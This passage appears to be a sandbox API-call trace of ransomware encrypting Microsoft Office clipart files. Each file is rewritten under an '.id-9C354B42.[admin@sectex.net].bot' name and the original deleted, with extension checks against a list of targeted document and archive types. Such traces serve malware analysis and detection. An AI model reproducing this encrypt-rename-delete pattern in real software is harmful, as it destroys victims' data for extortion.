	[0141.532] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.532] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.532] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.532] CloseHandle (hObject=0x3a0) returned 1
	[0141.532] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.532] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.535] CloseHandle (hObject=0x3ac) returned 1
	[0141.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf")) returned 1
	[0141.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.536] lstrlenW (lpString=".doc") returned 4
	[0141.536] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.536] lstrlenW (lpString=".docx") returned 5
	[0141.536] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.536] lstrlenW (lpString=".pdf") returned 4
	[0141.536] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.536] lstrlenW (lpString=".xls") returned 4
	[0141.536] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.536] lstrlenW (lpString=".xlsx") returned 5
	[0141.536] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.536] lstrlenW (lpString=".ppt") returned 4
	[0141.536] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.536] lstrlenW (lpString=".zip") returned 4
	[0141.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.536] lstrlenW (lpString=".rar") returned 4
	[0141.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.536] lstrlenW (lpString=".bz2") returned 4
	[0141.536] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.536] lstrlenW (lpString=".7z") returned 3
	[0141.536] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.536] lstrlenW (lpString=".dbf") returned 4
	[0141.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.536] lstrlenW (lpString=".1cd") returned 4
	[0141.536] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString=".jpg") returned 4
	[0141.537] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString=".doc") returned 4
	[0141.537] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString=".docx") returned 5
	[0141.537] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.537] lstrlenW (lpString=".pdf") returned 4
	[0141.537] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString=".xls") returned 4
	[0141.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.537] lstrlenW (lpString=".xlsx") returned 5
	[0141.537] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.537] lstrlenW (lpString=".ppt") returned 4
	[0141.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString=".zip") returned 4
	[0141.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.537] lstrlenW (lpString=".rar") returned 4
	[0141.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString=".bz2") returned 4
	[0141.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString=".7z") returned 3
	[0141.537] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString=".dbf") returned 4
	[0141.537] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString=".1cd") returned 4
	[0141.537] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63
	[0141.537] lstrlenW (lpString=".jpg") returned 4
	[0141.538] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.538] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.538] lstrlenW (lpString="BL00195_.WMF") returned 12
	[0141.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.539] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8070) returned 1
	[0141.539] CloseHandle (hObject=0x3ac) returned 1
	[0141.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 0x20
	[0141.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.539] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.539] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.540] GetLastError () returned 0x0
	[0141.540] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1f86, lpOverlapped=0x0) returned 1
	[0141.541] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1f90, lpOverlapped=0x0) returned 1
	[0141.542] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.543] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.543] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.543] CloseHandle (hObject=0x3a0) returned 1
	[0141.543] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.543] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.545] CloseHandle (hObject=0x3ac) returned 1
	[0141.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 1
	[0141.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.546] lstrlenW (lpString=".doc") returned 4
	[0141.546] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.546] lstrlenW (lpString=".docx") returned 5
	[0141.546] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.546] lstrlenW (lpString=".pdf") returned 4
	[0141.546] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.546] lstrlenW (lpString=".xls") returned 4
	[0141.546] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.546] lstrlenW (lpString=".xlsx") returned 5
	[0141.546] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.546] lstrlenW (lpString=".ppt") returned 4
	[0141.546] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.546] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.546] lstrlenW (lpString=".zip") returned 4
	[0141.546] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.547] lstrlenW (lpString=".rar") returned 4
	[0141.547] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString=".bz2") returned 4
	[0141.547] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString=".7z") returned 3
	[0141.547] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.547] lstrlenW (lpString=".dbf") returned 4
	[0141.547] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.547] lstrlenW (lpString=".1cd") returned 4
	[0141.547] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.547] lstrlenW (lpString=".jpg") returned 4
	[0141.547] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.547] lstrlenW (lpString=".doc") returned 4
	[0141.547] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString=".docx") returned 5
	[0141.547] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.547] lstrlenW (lpString=".pdf") returned 4
	[0141.547] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString=".xls") returned 4
	[0141.547] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.547] lstrlenW (lpString=".xlsx") returned 5
	[0141.547] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.547] lstrlenW (lpString=".ppt") returned 4
	[0141.547] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.547] lstrlenW (lpString=".zip") returned 4
	[0141.547] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.547] lstrlenW (lpString=".rar") returned 4
	[0141.548] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.548] lstrlenW (lpString=".bz2") returned 4
	[0141.548] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.548] lstrlenW (lpString=".7z") returned 3
	[0141.548] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.548] lstrlenW (lpString=".dbf") returned 4
	[0141.548] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.548] lstrlenW (lpString=".1cd") returned 4
	[0141.548] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63
	[0141.548] lstrlenW (lpString=".jpg") returned 4
	[0141.548] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.548] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.548] lstrlenW (lpString="BL00234_.WMF") returned 12
	[0141.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.549] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9304) returned 1
	[0141.549] CloseHandle (hObject=0x3ac) returned 1
	[0141.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 0x20
	[0141.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.549] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.549] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.550] GetLastError () returned 0x0
	[0141.550] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2458, lpOverlapped=0x0) returned 1
	[0141.551] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2460, lpOverlapped=0x0) returned 1
	[0141.552] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.553] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.553] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.553] CloseHandle (hObject=0x3a0) returned 1
	[0141.553] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.553] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.555] CloseHandle (hObject=0x3ac) returned 1
	[0141.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.555] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 1
	[0141.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.556] lstrlenW (lpString=".doc") returned 4
	[0141.556] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.556] lstrlenW (lpString=".docx") returned 5
	[0141.556] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.556] lstrlenW (lpString=".pdf") returned 4
	[0141.556] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.556] lstrlenW (lpString=".xls") returned 4
	[0141.556] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.556] lstrlenW (lpString=".xlsx") returned 5
	[0141.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.556] lstrlenW (lpString=".ppt") returned 4
	[0141.556] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.556] lstrlenW (lpString=".zip") returned 4
	[0141.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.556] lstrlenW (lpString=".rar") returned 4
	[0141.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.556] lstrlenW (lpString=".bz2") returned 4
	[0141.556] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.556] lstrlenW (lpString=".7z") returned 3
	[0141.556] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString=".dbf") returned 4
	[0141.557] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString=".1cd") returned 4
	[0141.557] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString=".jpg") returned 4
	[0141.557] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString=".doc") returned 4
	[0141.557] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString=".docx") returned 5
	[0141.557] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.557] lstrlenW (lpString=".pdf") returned 4
	[0141.557] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString=".xls") returned 4
	[0141.557] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.557] lstrlenW (lpString=".xlsx") returned 5
	[0141.557] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.557] lstrlenW (lpString=".ppt") returned 4
	[0141.557] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString=".zip") returned 4
	[0141.557] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.557] lstrlenW (lpString=".rar") returned 4
	[0141.557] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString=".bz2") returned 4
	[0141.557] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.557] lstrlenW (lpString=".7z") returned 3
	[0141.557] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.557] lstrlenW (lpString=".dbf") returned 4
	[0141.557] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.558] lstrlenW (lpString=".1cd") returned 4
	[0141.558] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63
	[0141.558] lstrlenW (lpString=".jpg") returned 4
	[0141.558] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.558] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.558] lstrlenW (lpString="BL00242_.WMF") returned 12
	[0141.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.558] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4024) returned 1
	[0141.558] CloseHandle (hObject=0x3ac) returned 1
	[0141.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 0x20
	[0141.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.559] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.559] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.559] GetLastError () returned 0x0
	[0141.559] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xfb8, lpOverlapped=0x0) returned 1
	[0141.846] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xfc0, lpOverlapped=0x0) returned 1
